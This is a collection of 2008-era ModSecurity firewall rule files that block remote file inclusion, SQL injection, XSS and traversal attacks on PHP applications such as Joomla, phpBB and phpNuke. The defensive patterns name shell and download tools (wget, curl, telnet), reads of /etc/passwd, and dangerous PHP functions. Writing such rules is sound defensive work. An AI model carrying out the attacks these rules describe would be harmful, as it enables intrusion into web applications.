SecFilterSelective REQUEST_URI "/index2\.php\?option=com_rss" "chain,rev:1,id:HG2007101732,deny,severity:5,msg:'DOS: Joomla 1.0.7'"
SecFilterSelective REQUEST_URI "feed=test\\\/>"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-formtools.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/global/templates/(admin_page_open\.php\?|client_page_open\.php\?)" "chain,id:HG2007121601,deny,msg:'RFI: Form Tools'"
SecFilterSelective ARG_g_root_dir "(\.\./\.\.|'|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-horde.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "go\.php\?.*(http|ftp)" "id:HG2008011001,rev:1,severity:2,msg:'Horde: go.php exploit'"
SecFilterSelective REQUEST_URI "!(horde/services/go\.php)" "chain,id:390144,rev:1,severity:2,msg:'Rootkit attack: Generic Attempt to install rootkit'"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\x20?\?"
SecFilterSelective REQUEST_URI "!(horde/services/go\.php)" "chain,id:390145,rev:1,severity:2,msg:'Rootkit attack: Generic Attempt to install rootkit'"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\?"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-invisionpowerboard.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/ad_member\.php\?" "chain,rev:1,id:HG2007102005,deny,severity:5,msg:'InvisionPB Exploit'"
SecFilter "emailer\.php"
SecFilterSelective REQUEST_URI "/ipchat\.php\?" "chain,rev:1,id:HG2007102006,deny,severity:5,msg:'InvisionPB Exploit'"
SecFilterSelective ARG_root_path "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php\?act=" "chain,rev:1,id:HG2007102007,deny,severity:5,msg:'InvisionPB Exploit'"
SecFilterSelective ARG_st "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|union)"
SecFilterSelective REQUEST_URI "/ipchat\.php\?" chain
SecFilter "conf_global\.php"
SecFilterSelective REQUEST_URI "/index\.php\?act=.*&max_results=.*&filter=.*&sort_order=.*&sort_key=.*&st=.*(UNION|SELECT|DELETE|INSERT|DROP|CONCAT|TRUNCATE)"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,rev:1,id:HG2007102007,deny,severity:5,msg:'InvisionPB Exploit'"
SecFilterSelective "ARG_comment|ARG_mid" "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| ]+[[:space:]](from|into|table|database|index|view)"
SecFilterSelective REQUEST_URI "/index\.php\?act=Login&CODE=autologin" chain
SecFilterSelective REQUEST_URI "((select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view)|user\+AND\+MID\(password)"
SecFilterSelective REQUEST_URI "index\.php\?" chain
SecFilterSelective ARG_st "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|\'|UNION.*SELECT.*INTO.*FROM)"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,rev:1,id:HG2007072025,deny:503,severity:5,msg:'HG: Invision RFI'"
SecFilterSelective ARG_showuser "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-joomla.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/admin_settings\.php\?" "chain,rev:1,id:HG2007120901,deny,severity:5,msg:'RFI: Joomla ARG: CONFIG_EXT[ADMIN_PATH]'"
SecFilterSelective "ARG_CONFIG_EXT[ADMIN_PATH]" "(\.\./\.\.|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,rev:1,id:HG2007111515,deny,severity:5,msg:'RFI: Mambo ARG: options'"
SecFilterSelective ARG_option "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective ARG_ff_compath "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007111501,deny,severity:5,msg:'Joomla: ff_compath RFI'"
SecFilterSelective REQUEST_URI "/(.+\.php)\.{1,4}" "rev:1,id:HG2007101746,deny,severity:5,msg:'PHP: Double File Extensions'"
SecFilterSelective REQUEST_URI "index\.php\?" "chain,rev:1,id:HG_SQL_JOOMLA01,deny,severity:5,msg:'RFI: Joomla SQL'"
SecFilterSelective REQUEST_URI "option=com_(eventlist|ezine|frontpage|gmaps|jombib|mambads|neorecruit|nicetalk|philaform|ponygallery|resman|remository|rwcards|search)" chain
SecFilterSelective REQUEST_URI "(select|union|username)[[:space:]]|(concat|jos_users|mos_users|password|select|union|username|usertype)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]"
SecFilterSelective ARG_absolute_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG_RFI_JOOMLA01,deny,severity:5,msg:'Generic absolute_path RFI'"
SecFilterSelective ARG_mosConfig_live_site "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG_RFI_JOOMLA02,deny,severity:5,msg:'Generic mosConfig_live_site RFI'"
SecFilterSelective ARG_mosConfig_absolute_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG_RFI_JOOMLA03,deny,severity:5,msg:'Generic mosConfig_absolute_path RFI'"
SecFilterSelective ARG_GlobalSettings[templatesDirectory] "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG_RFI_JOOMLA04,deny,severity:5,msg:'Generic GlobalSettings RFI'"
SecFilterSelective REQUEST_URI "/(.+\.php)\.{1,4}$"
SecFilterSelective REQUEST_URI "/components/com_content/models/(archive|category|section)\.php" "chain,rev:1,id:HG2007101711,deny,severity:5,msg:'RFI: Joomla SQL'"
SecFilterSelective ARGS "(union|select|password|username|from|concat|jos_users|mos_users|passwd|users)"
SecFilterSelective REQUEST_URI "index\.php\?option=com_rsfiles" "chain,rev:1,id:HG2007101714,deny,severity:5,msg:'RFI: Joomla RSFiles DL'"
SecFilterSelective REQUEST_URI "path=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_cropimage/admin\.cropcanvas\.php\?" "chain,rev:1,id:HG2007101734,deny,severity:5,msg:'RFI: Mambo CropImage 1.0'"
SecFilterSelective REQUEST_URI "cropimagedir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_mambowiki/MamboLogin\.php\?" "chain,rev:1,id:HG2007101735,deny,severity:5,msg:'RFI: Mambo MamboWiki 0.9.6'"
SecFilterSelective REQUEST_URI "IP=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_mospray/scripts/admin\.php\?" "chain,rev:1,id:HG2007101736,deny,severity:5,msg:'RFI: Mambo MoSpray 18RC1'"
SecFilterSelective REQUEST_URI "basedir=(http|https|ftp)\:"
# The next three pairs are chained like their neighbours; without "chain" the first rule of each pair would deny every request to the script.
SecFilterSelective REQUEST_URI "/components/com_extcalendar/admin_events\.php\?" "chain,rev:1,id:HG2007101738,deny,severity:5,msg:'RFI: Mambo ExtCalendar'"
SecFilterSelective REQUEST_URI "CONFIG_EXT[LANGUAGES_DIR]=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_forum/download\.php\?" "chain,rev:1,id:HG2007101739,deny,severity:5,msg:'RFI: Mambo phpBB'"
SecFilterSelective REQUEST_URI "phpbb_root_path=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_simpleboard/image_upload\.php\?" "chain,rev:1,id:HG2007101740,deny,severity:5,msg:'RFI: Mambo SimpleBoard'"
SecFilterSelective REQUEST_URI "sbp=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/includes/functions_cms\.php\?" "chain,rev:1,id:HG2007101741,deny,severity:5,msg:'RFI: Mambo phpBB'"
SecFilterSelective REQUEST_URI "phpbb_root_path=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/libraries/pcl/pcltar\.php\?" "chain,rev:1,id:HG2007101720,deny,severity:5,msg:'RFI: Joomla 1.5'"
SecFilterSelective REQUEST_URI "g_pcltar_lib_dir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_joomlaboard/file_upload\.php\?" "chain,rev:1,id:HG2007101731,deny,severity:5,msg:'RFI: Joomla Joomlaboard 1.1.1'"
SecFilterSelective REQUEST_URI "sbp=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_flyspray/startdown\.php\?" "chain,rev:1,id:HG2007101732,deny,severity:5,msg:'Mambo FlySpray Info Leak'"
SecFilterSelective REQUEST_URI "(file=config\.inc\.php|/etc/passwd)"
SecFilterSelective REQUEST_URI "/components/com_webring/admin\.webring\.docs\.php\?" "chain,rev:1,id:HG2007101732,deny,severity:5,msg:'RFI: Joomla WebRing'"
SecFilterSelective REQUEST_URI "component_dir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/index2\.php\?option=com_rss" "chain,rev:1,id:HG2007101732,deny,severity:5,msg:'DOS: Joomla 1.0.7'"
SecFilterSelective REQUEST_URI "feed=test\\\/>"
SecFilterSelective REQUEST_URI "/components/com_content/content\.php\?" "chain,rev:1,id:HG2007101744,deny,severity:5,msg:'RFI: Mambo PW Hash'"
SecFilterSelective ARGS "rating_sum" chain
SecFilterSelective ARGS "(concat|jos_users|mos_users|password|select|union|username|usertype)"
SecFilterSelective REQUEST_URI "/index\.php\?option=com_content" "chain,rev:1,id:HG2007101745,deny,severity:5,msg:'RFI: Mambo PW Hash'"
SecFilterSelective ARGS "(concat|jos_users|mos_users|password|select|union|username|usertype)"
SecFilterSelective REQUEST_URI "/index\.php\?option=com_content&task=vote&id=.*&Itemid=.*&cid=.*&user_rating=.*\((select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+(from|into|table|database|index|view)"
SecFilterSelective REQUEST_URI "/content\.php" chain
SecFilterSelective ARG_user_rating ".*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view)"
SecFilterSelective ARG_mosConfig_absolute_path "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index(2?)\.php\?.*mosConfig_absolute_path=(http|https|ftp)\:\/"
SecFilterSelective REQUEST_URI "/emailfriend/(emailarticle|emailfaq|emailnews)\.php\?id=\"(\<script|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-jportal.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/jportal/banner\.php" chain
SecFilterSelective REQUEST_URI "(UNION|SELECT|DELETE|INSERT)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-modernbill.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/samples/news\.php\?DIR=(http|https|ftp)\:/"
SecFilterSelective REQUEST_URI "/order/orderwiz\.php\?" "chain,rev:1,log,deny,msg:'ModernBill RFI'"
SecFilterSelective ARG_aid "(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>|(http|https|ftp)\:/"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-moodle.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "(/iplookup/ipatlas/plot|/course/category)\.php\?" "chain,rev:1,id:HG_SQL_MOODLE01,deny,severity:5,msg:'Moodle SQL'"
SecFilterSelective ARGS "(mdl_course|mdl_user|into dumpfile|union select)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-movabletype.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/skel\.php\?" "chain,rev:1,id:HG2007122801,deny:503,severity:5,msg:'HG: RFI: MovableType'"
SecFilterSelective ARG_page "(http|https|ftp)\:/"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-myspaceresource.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_rootBase "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007110501,deny,severity:5,msg:'MySpace Resource RFI'"
SecFilterSelective REQUEST_URI "/index\.php\?pg=forums" "chain,rev:1,id:HG2007111605,deny,severity:5,msg:'MySpace Clone SQLi'"
SecFilterSelective REQUEST_URI "union|\*\*|from.*admin"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-noahsclassifieds.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/classifieds/index\.php\?" "chain,rev:1,id:HG2007101830,deny,severity:5,msg:'Noah Classifieds SQL'"
SecFilterSelective REQUEST_URI "(union |select |classifieds_classifiedsuser|drop |insert into)"
SecFilterSelective REQUEST_URI "/classifieds/index\.php\?" "chain,rev:1,id:HG2007101830,deny,severity:5,msg:'Noah Classifieds SQL'"
SecFilterSelective ARG_otherTemplate "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-nucleus.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/nucleus/libs/PLUGINADMIN\.php\?" "chain,rev:1,id:HG2007101832,deny,severity:5,msg:'Nucleus RFI: GLOBALS[DIR_LIBS]'"
SecFilterSelective REQUEST_URI "GLOBALS[DIR_LIBS]=(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-open-realty.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-oscommerce.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/extras/update\.php\?" "chain,rev:1,id:HG2007101841,deny,severity:5,msg:'osCommerce RFI'"
SecFilterSelective ARG_readme_file "(\.\./\.\.|\.\./catalog/|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/default\.php\?" chain
SecFilterSelective "ARG_error_message|ARG_info_message" "((javascript|script|about|applet|activex|chrome)*>|(http|https|ftp):/)"
SecFilterSelective REQUEST_URI "/default\.php\?(error_message|info_message)=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/product_info\.php" chain
SecFilterSelective ARG_products_id "(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]"
SecFilterSelective REQUEST_URI "/product_info\.php\?" "chain,rev:1,id:HG200711181001,deny,severity:5,msg:'osCommerce RFI'"
SecFilterSelective ARG_products_id "(\.\./\.\.|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-osticket.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/(include/main\.php|view\.php)\?" "chain,rev:1,id:HG2007101833,deny,severity:5,msg:'osTicket RFI'"
SecFilterSelective "ARG_inc|ARG_include_dir" "(\.\./\.\.|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/view\.php\?" "chain,rev:1,id:HG2007101833,deny,severity:5,msg:'osTicket SQL'"
SecFilterSelective REQUEST_URI "(concat|union select|password|username|ticket_messages)"
SecFilterSelective REQUEST_URI "/(attachments|module)\.php\?" "chain,rev:1,id:HG2007101834,deny,severity:5,msg:'osTicket RFI'"
SecFilterSelective REQUEST_URI "file=(\.\./\.\.|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/include/(admin_login|header|open_submit|user_login)\.php\?" "chain,rev:1,id:HG2007101834,deny,severity:5,msg:'osTicket SQL'"
SecFilterSelective REQUEST_URI "(concat|union select|password|username|ticket_messages)"
SecFilterSelective REQUEST_URI "/(admin|include/main|view)\.php\?" "chain,rev:1,id:HG2007101910,deny,severity:5,msg:'osTicket SQL'"
SecFilterSelective "ARG_t|ARG_cat" "(concat|drop|select|password|username|union|ticket_messages|truncate)"
SecFilterSelective ARG_inc "(\.\./\.\.|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-perldesk.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/kb\.cgi\?" "chain,rev:1,id:HG2007101840,deny,severity:5,msg:'osTicket RFI'"
SecFilterSelective REQUEST_URI "(union select|password|username|from users)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpadsnew.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_phpAds_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101860,deny,severity:5,msg:'phpAdsNew RFI'"
SecFilterSelective REQUEST_URI "/libraries/lib-xmlrpcs.inc\.php"
SecFilterSelective REQUEST_URI "/maintenance/maintenance-activation\.php"
SecFilterSelective REQUEST_URI "/maintenance/maintenance-cleantables\.php"
SecFilterSelective REQUEST_URI "/maintenance/maintenance-autotargeting\.php"
SecFilterSelective REQUEST_URI "/maintenance/maintenance-reports\.php"
SecFilterSelective REQUEST_URI "/misc/backwards\x20compatibility/phpads\.php"
SecFilterSelective REQUEST_URI "/misc/backwards\x20compatibility/remotehtmlview\.php"
SecFilterSelective REQUEST_URI "/misc/backwards\x20compatibility/click\.php"
SecFilterSelective REQUEST_URI "/adframe\.php\?refresh=(.+)\'\>"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpauction.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpbb.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_phpbb_root_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101861,deny,severity:5,msg:'phpBB phpbb_root_path RFI'"
SecFilterSelective REQUEST_URI "/bbcodeSource\.php\?" "chain,rev:1,id:HG2007111603,deny,severity:5,msg:'phpBB bbCode RFI'"
SecFilterSelective ARG_example "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php\?module=PNphpBB2" "chain,rev:1,id:HG2007101870,deny,severity:5,msg:'phpBB SQL'"
SecFilterSelective REQUEST_URI "(user_password|from.+phpbb_users|union|where.+user_id|user_password)"
SecFilterSelective REQUEST_URI "/admin/admin_acronyms\.php\?" "chain,rev:1,id:HG2007101862,deny,severity:5,msg:'phpBB SQL'"
SecFilterSelective REQUEST_URI "(user_password|from.+phpbb_users|union|user_password|where.+user_id)"
SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
SecFilterSelective ARG_highlight "(x27|%27|x2527|%2527|'\.mysql_query\(|system\()"
SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
SecFilterSelective ARGS "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(([0-9a-fA-Fx]{1,3})\)"
SecFilterSelective REQUEST_URI "admin/admin_styles\.php\?" chain
SecFilterSelective ARG_install_to "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/downloads\.php\?" chain
SecFilterSelective REQUEST_URI "(UNION|SELECT|DELETE|INSERT)*user_password.*phpbb_users"
SecFilterSelective REQUEST_URI "/cal_view_month\.php\?" chain
SecFilterSelective REQUEST_URI "(UNION|SELECT|DELETE|INSERT)"
SecFilterSelective REQUEST_URI "/links\.php\?" chain
SecFilterSelective ARG_id "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/dlman\.php\?" chain
SecFilterSelective ARG_file_id "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective ARG_sid "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php\?(c|mark)=*'"
SecFilterSelective REQUEST_URI "/portal\.php\?" chain
SecFilterSelective ARG_article "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/album_search\.php\?" chain
SecFilterSelective ARG_mode "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/moddb/mod\.php\?" chain
SecFilterSelective ARG_id "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/auction_rating\.php\?mode=.*&u=.*'"
SecFilterSelective REQUEST_URI "/auction_offer\.php\?mode=.*&ar=.*'"
SecFilterSelective REQUEST_URI "/profile\.php\?mode=viewprofile&u=.*((javascript|script|about|applet|activex|chrome)*>|html|(http|https|ftp):/)"
SecFilterSelective REQUEST_URI "/viewtopic\.php\?*" chain
SecFilterSelective ARG_highlight "((javascript|script|about|applet|activex|chrome)*>|html|(http|https|ftp):/)"
SecFilterSelective REQUEST_URI "/posting_notes\.php\?mode=editpost" chain
SecFilterSelective REQUEST_URI "(delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[A-Z|a-z|0-9|*| ]+[[:space:]](from|into|table|database|index|view|select)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpclassifieds.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_path_escape "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2008012401,deny,severity:5,msg:'phpClassifieds RFI'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpcoin.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/(api|common|constants|core|custom|db|redirect|session_set)\.php\?" "chain,rev:1,id:HG2007101890,deny,severity:5,msg:'phpCoin RFI'"
SecFilterSelective "ARG__CCFG[_PKG_PATH_INCL]" "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpesp.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpformgenerator.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phplist.conf: 2008-04-02 17:01:45.000000000 -0500: jshanley@

SecFilterSelective "ARG_GLOBALS[database_module]" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101870,deny,severity:5,msg:'phpList RFI'"
SecFilterSelective "ARG_GLOBALS[language_module]" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007102201,deny,severity:5,msg:'phpList RFI'"
SecFilterSelective REQUEST_URI "/(addsite|config|editsite|in)\.php\?" "chain,rev:1,id:HG2008040101,msg:'phpList RFI'"
SecFilterSelective ARG_returnpath "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/lists/admin/\?page=admin&id=*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|*| |,]+[[:space:]](from|into|table|database|index|view)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phplive.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/phplive/help\.php\?" "chain,rev:1,id:HG2007111812,deny,severity:5,msg:'phpLive RFI'"
SecFilterSelective ARG_css_path "(\.\./\.\.|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpmyadmin.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/calendar\.php\?calbirthdays=.*&action=.*&day=.*&comma=*(cd|\;|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|lwp-(download|request|mirror|rget)|id|uname|cvs|svn|(r|s)sh|(s|r)cp|rexec|smbclient|t?ftp|ncftp|curl|telnet|gcc|cc|g\+\+|\./)"
SecFilterSelective SCRIPT_FILENAME "export\.php$" chain
SecFilterSelective ARG_what "\.\."
SecFilterSelective REQUEST_URI "/css/phpmyadmin\.css\.php\?GLOBALS\[cfg\]\[ThemePath\]=/etc"
SecFilterSelective REQUEST_URI "/phpmyadmin/index\.php\?pma_username=*&pma_password=*&server=.*<=.*&convcharset=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpnuke.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/modules\.php" "chain,rev:1,id:HG2008012301,deny,severity:5,msg:'phpNuke SQLi'"
SecFilterSelective ARG_sid "(union|select|concat|radminsuper)"
SecFilterSelective ARG_nuke_bb_root_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007102501,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective REQUEST_URI "/modules\.php\?" "chain,rev:1,id:HG2007101855,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective REQUEST_URI "ACCEPT_FILE[?]=(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "(/\?module=PNphpBB2|/index\.php\?)" "chain,rev:1,id:HG2007101855,deny,severity:5,msg:'phpNuke SQL'"
SecFilterSelective REQUEST_URI "(concat|user_password|union select|pn_phpbb_users)"
SecFilterSelective REQUEST_URI "/modules\.php\?" "chain,rev:1,id:HG2007101856,deny,severity:5,msg:'phpNuke SQL'"
SecFilterSelective ARG_url "(concat|user_password|union select|pn_phpbb_users|insert into)"
SecFilterSelective REQUEST_URI "/modules/vwar/convert/mvcw_conver\.php\?" "chain,rev:1,id:HG2007101850,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective REQUEST_URI "vwar_root=(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/(modules/Web_Links/index|modules)\.php\?" "chain,rev:1,id:HG2007101860,deny,severity:5,msg:'phpNuke SQL'"
SecFilterSelective ARG_l_op "(viewlinkcomments|viewlinkeditorial|ratelink)" chain
SecFilterSelective ARG_lid "(concat|user_password|union select|pn_phpbb_users|insert into)"
SecFilterSelective REQUEST_URI "/modules/vwar/extra/online\.php\?" "chain,rev:1,id:HG2007101859,deny,severity:5,msg:'phpNuke RFI Virtual War'"
SecFilterSelective REQUEST_URI "(concat|user_password|union select|pn_phpbb_users|insert into|union.+select|vwar_member/|nuke_users/)"
SecFilterSelective REQUEST_URI "/iframe\.php\?" "chain,rev:1,id:HG2007101851,deny,severity:5,msg:'phpNuke iFrame RFI'"
SecFilterSelective REQUEST_URI "file=(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/gallery/displayCategory\.php\?" "chain,rev:1,id:HG2007101852,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective ARG_basepath "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/master\.php\?" "chain,rev:1,id:HG2007101853,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective ARG_root_path "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules/vWar_Account/includes/functions_common\.php\?" "chain,rev:1,id:HG2007101854,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective ARG_vwar_root2 "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php.*func=*(\.\./|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?op=modload&name=Messages&file=readpmsg&start=*(delete|insert|drop|do|alter|replace|truncate|update|create|rename)"
SecFilterSelective REQUEST_URI "modules/Downloads/dl-viewdownload\.php" chain
SecFilterSelective ARG_show "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]]"
SecFilterSelective REQUEST_URI "/modules/pn_bbcode/pnincludes/contrib/example\.php"
SecFilterSelective REQUEST_URI "/modules\.php\?*name=*\<*(script|about|applet|activex|chrome)*\>"
SecFilterSelective REQUEST_URI "/modules\.php\?op=modload&name=News&file=article&sid=*\<*(script|about|applet|activex|chrome)*\>"
SecFilterSelective REQUEST_URI "/modules\.php\?name=Search&type=comments&query=.*&instory=.*UNION.*SELECT.*pwd.*FROM.*nuke_authors"
SecFilterSelective REQUEST_URI "/modules\.php\?*name=Search*instory="
SecFilterSelective REQUEST_URI "/modules\.php\?*name=(Search|Web_Links).*\'"
SecFilterSelective REQUEST_URI "/modules\.php\?*name=<[[:space:]]*script"
